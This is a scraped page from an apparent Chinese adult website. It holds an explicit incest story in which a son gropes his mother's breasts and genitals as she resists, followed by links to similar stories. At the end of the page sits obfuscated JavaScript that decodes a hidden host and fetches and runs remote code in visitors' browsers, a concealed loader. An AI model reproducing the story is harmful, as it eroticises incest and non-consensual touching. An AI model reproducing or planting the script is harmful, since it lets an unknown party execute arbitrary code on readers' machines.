返回

与妈咪最爽的车震9ac

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

一早,下着小雨。妈咪还没起床,也许昨天累了吧,约了死党要拿车,穿上雨衣后就出门了。

回来后,妈咪已经盥洗完毕,穿上了她第一天的衣服,白毛衣跟黑长裙,妈咪的神色并没有因为昨天的事有所改变,而透过白毛衣的应该是第一天的黑色胸罩。昨天,虽然看到了妈咪给我的回答,不过有点失望,妈咪还是选了深色系的内衣裤,对于女人来说,内衣的颜色表示着心情与接受度,如果妈咪有听我的选浅色内衣裤的话,对于我们两的亲蜜度更是有帮助。

我对妈咪提起九份下着雨时是最有气氛的,妈咪高兴的说一定要去走走,不过先要去阿姨那拿衣服。今天下着小雨有点冷,而车内则是音乐声不断,这台车我开了不少次,通常都是对女人的最后一击才会动用,想着后座可留下我辉煌的战果,今晚不会让我失望ㄚ~。

到了小阿姨家,小阿姨只穿着小可爱跟小热裤就开门让我们进去,见到妈咪就基哩刮拉的讲了起来。小阿姨比我妈小五岁,身高也少了几公分,不过身材比例跟我妈咪一样赞,脸妈咪是闲慧,而小阿姨则是阳光型的,感觉很健美,刚刚可能在运动吧,脸有点微红。此时,我的眼光弃妈咪而就小阿姨,真对不起了,妈咪你包太紧了~

小阿姨穿的小可爱是粉红色的,里面好像就没穿了,应该有胸垫,倒也看不到乳头,小热裤就让她的大腿尽收眼底,她和妈咪坐在沙发上,我则在客厅走来走去看着柜子里的美术品。绕到她们后面时,我从上而下的望着小阿姨的胸部看去,乳沟比正面看明显多了,随着讲话的起伏上下挺立着,当然我也没有冷落妈咪,只是毛衣可露出的部份真是少的可怜,

到了九份,吃了有名的芋圆,拍了几张照片,九份人太多了反而没气纷。看天气不错,我带着妈咪去看金瓜石的矿坑,妈咪显得很好奇的样子,看着人群一阵阵的往上走,便问我那有什么好玩的,我顺口回答说是日本神社吧,妈咪一听就直说要去参观参观(其实,只剩一点遗迹了),虽然还要爬一阵子,不过不忍扫妈咪的兴,就带妈咪去啰。

妈咪缺乏运动,没走几下就气喘嘘嘘了,跟在妈咪后面,看着一扭一扭的小屁屁,很想假装跌倒抓上去,我望着上面还算蛮多的阶梯,想说如果是小阿姨应该可以走比较久吧,不过应该没机会跟小阿姨单独出游,可惜了~。后来我就牵着妈咪一阶一阶的慢慢走,有时也不忘拿出相机跟妈咪一起合拍,好不容意到了神社,妈咪却有点失望,因为神社都差不多倒光了,留个入口的门,等看到远远的海,心情又开朗起来了。

“小翔~风景好好哦~不过爬上来有点累就是了~”妈咪穿着高根鞋,当然吃力多了

“对ㄚ,不过在这边看一看海跟山,心情就会变好哦~”我对着海大叫了几声

在野外心情好多了,妈咪也除去这两天对老爸的不爽,高兴的跟我讲东讲西,想去那玩那玩的,还说要多运动等等。讲着讲着我发现人慢慢都下山去了。看看表也四点多了,天气暗很多了,看起来又要下雨,妈咪跟我仓徨的往下走,走着走着,妈咪阿的一声,滑了一下,我顺势沟住妈咪的腰让她站稳,

“妈咪~小心耶~你还好吗?~”我担心又努力闻着妈咪的汗味~

“嗯,脚好像有点扭到了,真糟糕,都怪妈咪贪玩说要爬这~”妈咪左大腿向前,然后小腿往侧边勾了起来,黑裙子把美丽的曲线勾勒了出来,只见鞋根都是泥巴,一时也不知道那边扭伤。

“那~妈咪我背你好了~”我有点想趁机吃豆腐却又有点担心自己体力不好,搞不好走一下就受不了了。

“不用啦~妈咪还可以走~不过可能要扶我一下喔~”妈咪看出我的担心~

我点点头,将妈咪的左手拉过我的肩榜,接着又搂住妈咪的小蛮腰,在下山的过程,妈咪的左乳房不时的摩擦着我的右胸,这下不但妈咪脚痛不好走路,我也因为胯下卡个东西脚步放慢了。雨下了下来,越来越大,这不是我愿意的,因为这一下弄湿了我死党的车,他会想砍我。

我和妈咪行走的速度也加快,因为身高的差距,本来右手是扶着妈咪的腰,慢慢也改成往上抬起的动作,走了一段路,我的手已经移位到妈咪的右乳房下方了,妈咪的右手往头上遮着雨,随着一次次的脚步,一次次的触碰着内衣的下弧度钢丝,只可恨有人发明胸罩,要不然我的手也可以当做下弧度钢丝托住妈咪的俏乳,因为妈咪的动作让我更生暇想,看起来蛮像是妈咪把手抬起方便我袭胸,妈咪的表情开始有点变化,连呼吸都混乱了,最后妈咪觉得走太快了,

“ㄚ~好远哦~小翔~算了啦,慢慢走好了,反正都湿的,就来个雨中漫步吧~~~”妈咪耍了个浪漫~拨拨头发上的雨水,也帮我擦了擦头上的雨。

“ㄟ~妈咪看不出来你还挺浪漫的捏~”我逗着妈咪笑,看着妈咪脸颊流下的雨水与淋湿的身影,我很甘愿雨中漫步的!

“妈咪是挺爱浪漫的,可是你爸爸就懒了~送个花什么的是好久以前的事了~”妈咪嘟的嘴为她没有被浪漫到抱怨着~

“好啦好啦~妈咪乖~我把我的浪漫分一些给妈咪你好了~”我边说边放开妈咪的左手,用双手将妈咪的腰环绕着一圈。

“哦~真的吗?小翔还有多的可以分人哦?哈哈~”妈咪打趣的问~

“哈哈~我也不知道耶,通常也要看对方浪漫不浪漫的起来ㄚ,不然送个花被回干麻浪费钱也是很无辜低~”我装出周星驰的招牌口气~

接着靠近妈咪的脸庞说“像妈咪这样的女人就会让我不自主的浪漫了起来说~”

妈咪往旁边偏了一下,想想后揪着双眉对我说“哦~那小芬像妈咪啰?”

“妈咪~我觉得你比小芬更好耶~”说时不自觉得将妈咪往我身上压过来一点,好想用老二顶的妈咪。

妈咪嗯了一下,傻傻的笑了一下,不知道想什么,也许是想我说的更好是胸部更大还是什么好,接着便说我爱乱说话,催促我快点回车里。

我和妈咪上车后对看了一眼马上都笑了出来,我将暖气开到最大,然后各自拿卫生纸擦着雨水,妈咪亏我说借了车还比骑车时湿,我则回亏妈咪这套衣服旱灾时可以穿出来祈雨。休息一下之后,我就延着金瓜石山路往山下开,妈咪接连几个喷嚏打了出来,我想了一下,嘿~有好戏,把车开到旁边没人的树下停了下了,对着充满疑问的妈咪说

“妈咪,这样不行,厄~不是才从小阿姨那拿了衣服来吗? 要不要换一下ㄚ?”我降低声音建议着。

“ㄟ~对喔~妈咪都忘了~可是~”妈咪看了我一眼~

我当然知道妈咪在担心什么,急忙说“妈咪,嘿~怕我偷看哦??好啦,我先出去等你换好再进来好了~”我望着外面不小的雨装可怜的说着。

妈咪迟疑了一下,“ㄚ,不是啦,不用啦,外面雨不小ㄟ~”妈咪想换又不好意思。

“嗯~这边蛮暗的,动作快一点就好了~”我装作若无其事的说,心里想着找暗点的地方才不会便宜到别人了。

“嗯~”妈咪还在迟疑,我便转身到后座拿了袋子到前座,装作要打开的样子~

妈咪急忙接过袋子,可能怕被看到内衣裤吧~~我看着妈咪左右为难的样子,心中觉得好笑,一个喷嚏又从妈咪嘴里打了出来,

“嗯~好吧~湿湿的真的很不舒服~”妈咪壮起胆来对着档风玻璃讲,然后转向我看了几秒,

“咳~小子,那~你还不转过去?”妈咪看我一直看着她,有点不好意思的说~

“喔~”我装出失望的声音转向旁边的窗户,发现窗户的倒映也可以清处的看见妈咪的动作。

妈咪侧转背向我,先是双手向上的脱去了毛衣,一条黑色的横条出现在妈咪光滑的背上,而且没有黑吊带,耶?~妈咪今天把吊带拿起来了,可以这样穿表示妈咪的胸部很有料,可以撑住奶罩而不会掉下来,至少够挺。接着她从袋子里翻来翻去拿出别件胸罩,深紫色的,呼~这又比黑色的性感了些,我开始侧过身背向妈咪,偷偷的摸着我开始肿起来的老二。

妈咪伸出右手反手到背后很快的解开了胸罩的背扣,黑色胸罩落了下来,侧面多出了一团美肉,妈咪迅速的将后背及胸前擦了一下,拿着紫色的胸罩穿了上去,将后扣扣好,然后把肩带拉好,又觉得肩带不舒服,取了下来,再来像是用手调整乳房在奶罩的位置~

“呼~紫色好性感哦~”说完我也吓了一跳,怎自己把心里的话讲了出来

“阿~”妈咪小声的叫了一声,自然的转身看向我,我也很自然的转身面对妈咪。

只见妈咪满脸通红,脸上充满着被偷窥的害羞

“你偷看喔!?”妈咪转身时,手上抓着黑色胸罩,也忘了现在只穿内衣面对我。

“厄~不是啦~不是啦~”讲话的当时,我的眼神很专注的对上妈咪的双峰,看着妈咪被包裹住隆起的肉团,还有隐隐约约还没摆定位的奶头。讲完后我也忘了闭起嘴巴,对着眼前的妈咪愣住了。

妈咪见我才刚转过来,而且一转过来便一直看着她的胸部,才想起忘了遮,赶紧捉着黑色胸罩档住,一看怎拿胸罩档又拿起毛衣来遮,这下子妈咪脸红到耳根了,但是还是奇怪我怎么知道~~

“ㄟ~没偷看怎么知道??”虽然难为情,妈咪还是问出口了

我讲出玻璃倒映出来才看到的,妈咪才消去一点被侵犯的感觉,转头看我依旧出神的看着她,又说

“咦~我~我还没换好啦~”女人害羞的口气真的好可爱

“哦~我以为你换好了嘛~”我开始不叫妈咪了,转换成对一个女人说话的语气。

“那有?看也嘛知道~”妈咪急着想穿上衣服

“ㄛ~我想说这样比较舒服”讲完便想到第一天妈咪为了舒服睡觉脱内衣被我偷看到的情景。

“嗯?转过去转过去~”妈咪用手比了个回转的手势给我~

“可是~转过去还是看的到捏~不是故意要看的捏~~”我开始赖皮了~

妈咪想了一下,看看裙子,想说还有裤子也要换“那我去后座换好了~~”

哇哩,被破解了,真糟糕@@,不过也不能再凹什么。妈咪先把袋子放到后座,然后左手用毛衣遮着上身,右手撑住我座位的肩头,试图穿过中间到后座去,也许是穿裙子的关系,妈咪换了几个角度都不是很顺,我假好心的把椅子往前挪方便妈咪过去,顺便也试图距离吸吸奶的香气。

小腿伸过去之后,突然妈咪重心不稳,右手滑了一下,瞬间我梦寐以求的事情发生了,妈咪的小手居然压在我勃起的老二上,左手忙着抓住隔壁座的椅背,让两团美肉尽现我眼前没法遮住,倒下时奶罩也滑了一下,两颗嫩嫩但已是咖啡色的乳头刚好跳出在胸罩外,妈咪紧张的看着我,我也看着妈咪,一下子气氛尴尬到极点。

妈咪当然知道右手压着的是什么东西,我们各自有千百种滋味在心中,害羞、尴尬、不知所措,妈咪强做振定的想要起身,也许是不知道要先动那只手,一下子用左手遮着胸,一下子想拉背椅起身,一下子想用右手撑起自己。

妈咪右手一用力,我就感觉到妈咪的小手包住我的老二,撑起来时用的力更像是抚摸挤压我的阳具,让我兴奋得小喘着气。没有挤压快感时,除了手的刺激外,还有胸前小巧可爱的奶头与窝窝头的俏乳房可以看。妈咪试了几次都没办法起身,发现我硬着不时跳动的老二与贪婪的情欲眼神,还是装作没事般却有点娇喘的说“嗯~扶我一下~”随着话越来越小声~

我则是失神般的和妈咪对望,心中也不知道该如何,要扶还是~~~!?妈咪见我没反应,也将头顺势自然的靠着排档,摆出快点扶我啦的表情~

我伸出手轻轻摸着妈咪湿湿的头发~像是对着自己的女人般温柔,也是抚摸着到手的猎物,我低下头靠向妈咪

“你~好~性感~”

妈咪经过前两天的调情,好像比较玩的起有经验了,并没有太大的惊讶,而是掩释害羞的笑着偏过头去,小小的车中能感觉到妈咪起伏的呼吸跟不规率的心跳,我慢慢往妈咪的嘴唇靠近,妈咪有点像卡在中间动不了,躲的地方不多,轻易的被我吻上了,还好我柔软度够,要不这亲吻角度也有点难。妈咪哎了几声,有了昨夜的舌头接触,这次妈咪虽然没主动,却也被动的任我吸允着,其间妈咪也有试着想移动,不过只有左手能动作,右手则是像不敢刺激我而放在我的老二上不敢乱动,这样反像是在感受我老二的跳动。

几秒后我开始进攻,右手从妈咪的脸颊慢慢滑下,经过带心型项炼的脖子,到了锁骨,虽然精虫充脑,还是让我想到英伦情人中用锁骨来调情的几幕,当然目标是那裸露在外的两颗樱桃。

妈咪似乎发现我的目标,开始紧张的用左手护着胸前,我没有硬把妈咪的手拉开,只是寻着空细摸索着,几次和奶头的接触,都嫌太短暂不过瘾,我索性调虎离山,跳过妈咪的胸部,往下体攻去。

妈咪明显的震了一下,急忙舍胸部去护阴部,趁机会我摸回那让我肖想很久的双峰,先将妈咪的紫色奶罩往下拉,然后顺手攻上了樱桃山顶,用手掌贴着妈咪开始充血的奶头,好光滑弹性好有满足感的触感,五指抓着妈咪D罩杯的美肉,缓缓的揉着,慢慢的像揉面粉般越揉越重,贪婪的玩弄着左右乳房。妈咪发出娇喘的声音,更不掩饰她的呼吸急缓声,让我更加兴奋。妈咪一定感受到我老二因为奶头的刺激而跳动着,我将左手压着妈咪的右手,让他随着我的手也有规律的揉着我的老二。

妈咪这时左手又回到胸前干扰,我想一不做二不休,看能不能在这干了妈咪,伸手从腰部摸进妈咪的阴部,只碰到阴毛就被妈咪压住收回了。妈咪警觉了起来,摆开她的头,看着旁边喘着

“嗯~好了啦~小翔~不要再闹了~快点扶我起来~”妈咪又装没事的讲着,

我知道妈咪的底线要慢慢突破,太硬来到头来一定翻脸,只好扶起了妈咪,让她到后座去,妈咪到后座后不发一语,我想还是不要先说话好了。只见妈咪还是侧过身赶紧穿好胸罩,然后穿上米色无袖上衣,转过头来时发现我还在看她而且拿着她的黑色胸罩。

“ㄟ??豆腐能吃的都吃过了,还想做什么?”妈咪边闷闷的说边伸手拿回她的奶罩。

“妈咪~你~生气啰? 刚刚气氛太浪漫了,我就忍不住~那个~”我话也讲不太完整~

妈咪好像也有点回味的嗯了一声,“那~你还想看什么??”妈咪有时会讲出有点挑逗的话,不过我想应该都是误会比较多,就像昨天的”自己看”一样。

我装了个色色的脸,知道妈咪要换裤子,也知道再闹下去没有好结果,也就坐了下来看着档风玻璃,几分钟后妈咪爬到前座,我发动车子~

“嗯….妈咪,现在你~现在可以告诉我你穿的奶罩颜色了吗?”说完指着我的脸颊想要妈咪亲一下

“哎~闹够了啦~走了啦~快点~妈咪肚子饿了~”妈咪只能编个理由档掉,有让的地方就有不让的地方,好吧,刚刚也爽了一下,于是就带妈咪杀去基隆庙口吃吃喝喝一番~~

开车回台北的路上,放着我最爱的爵士音乐,每次听到萨克斯风就会有冲动想去学,学起来一定很帅,把妹妹会更顺利。回程上,妈咪的话也少了起来,有一句没一句的,就在换曲的中间,我听见了妈咪温和平稳的呼吸声。妈咪睡着了,爬了一天,对妈咪来说当然累了。看着妈咪的小腿收在座位上,脸往我这偏的靠在椅背,头发则顺着妈咪的脸庞散下,一脸安祥的睡着,我一路小心的避开坑洞,维持着车子的平稳,怕吵醒沉睡的妈咪。

回到台北,我思考着要直接回家还是做个漂亮的结尾,想着想着便把车开到后山夜景最棒的地方。今天下着雨,看夜景的人不多,连摊贩都懒得来了。随便找个暗一点的地方停下了车,望着妈咪依旧沉睡的脸蛋,好想亲一下,解开了安全带,起身用双手撑在妈咪的两旁,想要一亲芳泽,这时妈咪悠悠的醒来,有点受惊的问着

“小翔,你要干嘛?!”

“喔~没有啦~我看妈咪睡的很辛苦,想要帮妈咪把椅背放下来比较好睡ㄚ~”我匆容的讲着用过很多次的说词。

“喔~妈咪还以为…”妈咪有点错怪我的表情。

“ㄟ~到那了?..”妈咪看着窗外的夜景问着

“看夜景ㄚ,今天下雨,要不然会感觉更近哦~”我边说边将身体横在妈咪的身上,装着要把椅背放倒。

“很棒吧~”放下椅背后,我顺势贴近妈咪耳朵问着。

“嗯~好好哦~都没人带我看夜景过说~妈咪觉得好幸福~”妈咪也不在意的让我贴近,我便吸了几下鼻子,闻闻妈咪的香味~~

“妈咪,你好香~”说了以后变用舌头去舔妈咪的耳朵~妈咪耳朵很敏感,马上痒的躲来躲去,我想要趁机会进一步时~~

“小翔,不过妈咪累了,我们回去好不好~改天再看”好像妈咪发现了此处可能是今天最凶险的地方,不敢让步的对着我说~~我完全被封杀的只好坐回位置发动了引擎,我对不起这台车ㄚ~让他百战百胜的功绩染上了污点。

回到家后,照样妈咪洗完了早吹完头发就看看电视上床睡了,我则是因为打了败仗,虽然吃不到,但是要有风度,不过仍难掩心中的感觉,有点失望加生气的不太搭理妈咪。洗澡时看见妈咪的紫色胸罩仍是摆在最上面,却想到连亲都不给亲就不想把玩,完全冷掉啦~。出来跟妈咪道了晚安就关上灯,兀自躺在床上想着下午应该强硬一点才对,毕竟是机会不多ㄚ。

懊悔了半小时,突然听到妈咪喊我,本来不太确定,后来妈咪又喊了一声,我便回话。

“小翔~你在生气吗?~”妈咪猜测而小心的问着我。

“ㄚ~妈咪你怎还没睡~没有啦,有什么气好生的?”我小心的隐藏我心中吃不到的不爽。

“哦~~”妈咪有点失落的回着~

又过了几分钟~

“小翔~妈咪刚睡过,现在好像睡不太着耶~嗯~还有什么地方可以晃的吗?”咦~妈咪一向早睡,怎么今天睡不着了哩。

“嗯~有ㄚ~妈咪~山上还有很多地方可以看景的说”我边说边起身开了灯,我也不知道妈咪现在穿什么,只看见她拿着棉被包着。

“嗯~要带我去看看吗??”妈咪看起来根本没睡意,有点怕我麻烦的问着。

“当然好ㄚ,哈哈,难得妈咪有兴趣夜游~小的一定奉陪到底~”我因为有起死回生的感觉,开始耍嘴皮了~

接着,妈咪叫我先去开车,她穿一下衣服就下来。等妈咪上车后,我瞄了瞄妈咪,嗯!一套灰色丝质连身服,裙子只开到膝盖,坐下后又露出些许的大腿,上身批了一件棉质米色批肩,看起来颇正式的~

“ㄟ~妈咪~穿这么漂亮~要去夜游哦~碰到色狼怎么办ㄌㄟ”我恢复平日的口吻说着

“ㄚ~有吗~就只有这几套衣服了,你哦~还色狼哩~你~你不要是色狼就好了~”说完似乎想起下午的事,有点不好意思~我则不知道这次会不会有收获,小心亦亦的刺探先好了~

“那妈咪想去晃什么ㄌㄟ? 阳明山公园的车床很有名哦~想看吗??”我又不正经了起来

“哎~小子皮起来了~越晚越皮喔~随便晃晃吧~”收到妈咪的指令,我开着车乱晃了一阵,后来开到后花园那的中华电信发射台附近,妈咪显得很好奇的样子,我停下车让妈咪看个够,当然是停在暗一点的地方啰。

发射台这边有很多大型的碟盘,我第一次来的时后也觉得气氛很微妙,像是到了外星球(大概看起来蛮有X档案的感觉),我讲出我的见解给妈咪听,再加上外面下着雨又有些雾,妈咪也颇有同感,接着妈咪打了个哈欠,时间已经一点多了,我装体贴的问妈咪要不要回去了,只见妈咪又望着外面看了看没回答,过了几秒~

“小翔~你在生气,对不对?”妈咪有点质问的口气。

我一下子不知道该怎样答,说没有又不像,说有又有啥好生气的。妈咪嗯了一声~

“小翔,妈咪知道有时会停不住,可是~”妈咪停顿了一下,像是考虑要不要接着说~

“可是像~你以前国中时拿妈咪的~嗯~内~衣~去~不~行~吗~”靠~果然被发现,只怪我以前一直以为妈咪不知道,就一次比一次随便,就算有精液在上面也是随便擦掉就算了。此时的我不知该说什么了,像偷糖被发现~~

我只有吱吱唔唔的回着,“可是这次你也没有拿~嗯~妈咪的~内衣去~那个~”妈咪自己讲的不好意思起来。妈咪ㄚ,不是没有,是小心收尾了啦~以前可能被头发的小方法识破了吧~哇哩~

“嗯~因为~我觉得对妈咪的~内衣~做那个~不是很好~,好像~不遵重妈咪的感觉~以前是~嗯~不懂事嘛~”我只好开始辨解了~当然是讲假话~

“小翔~你真的变体贴了,又成熟多了~,让妈咪这几天~还以为~变成~你的~女人了”妈咪越讲越结巴,不过边讲边伸手摸了摸脚踝~~

突然想到妈咪今天有扭到,嗯了一声指指妈咪的脚转移话题的问

“脚还痛吗?”当然语气附上十分满的温柔~

“嗯,突然有点痛了~奇怪~”妈咪边弯腰边揉了揉~

这时我也弯下了腰,伸手去帮妈咪,可是角度不好揉

“妈咪~你把脚抬过来好了~”我讲这话时可是完全没有别的意思,被破解了,所以都没进攻欲了吧。

妈咪想了一下,可能又怕曝光,不过还是将脚往我这边移来架在排档上,我看到妈咪迟疑了一下,想要亏妈咪,便问~~

“妈咪~你~有穿~嗯~内裤吧?要不然怕曝光~”我硬是看着妈咪的脸问~

妈咪听到脸红着笑了一下回说“有啦~有啦~乱猜什么~”

我脱去妈咪的高根鞋,顺着妈咪的脚踝不停的揉着,虽然不是很会,还是装做很熟的顺便按了妈咪的小腿,此时渐渐的又有重整旗鼓再出发的欲望。我边按边故意把妈咪的小腿往上抬一些,企图想窥见妈咪的大腿根部,那个我尚未开发过的地方,也许是动作越来越明显,妈咪有点紧张的整整裙摆,让我扑了个空。

“ㄟ,小子,技术不错哦~妈咪我好多了,不过~齁~你~刚刚在偷看那边ㄚ?”果然被发现了,突然觉得妈咪的察言观色的功力不在我之下。

“咳~没有啦,只是想到妈咪都没~嗯~亲口回答我过~”也不知道为什么,每次妈咪叫我小子的时后,我就觉得可以再大胆一点~

评分
相关推荐
3.0分

3.0分 【与妈咪最爽的车震】147

3.0分

3.0分 【与妈咪最爽的车震】【完】929

3.0分

3.0分 与妈咪的性事267

3.0分

3.0分 妈咪——我的最爱d9e

3.0分

3.0分 母诗之妈妈车震往事924

3.0分

3.0分 母诗之妈妈车震往事924

3.0分

3.0分 车上与姨妈320

3.0分

3.0分 【雨中的激情,与老师车震】62b

3.0分

3.0分 雨中的激情,与老师车震16b

3.0分

3.0分 雨中的激情,与老师车震16b


提示:为了您能够顺利的找到本站,请牢记:WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};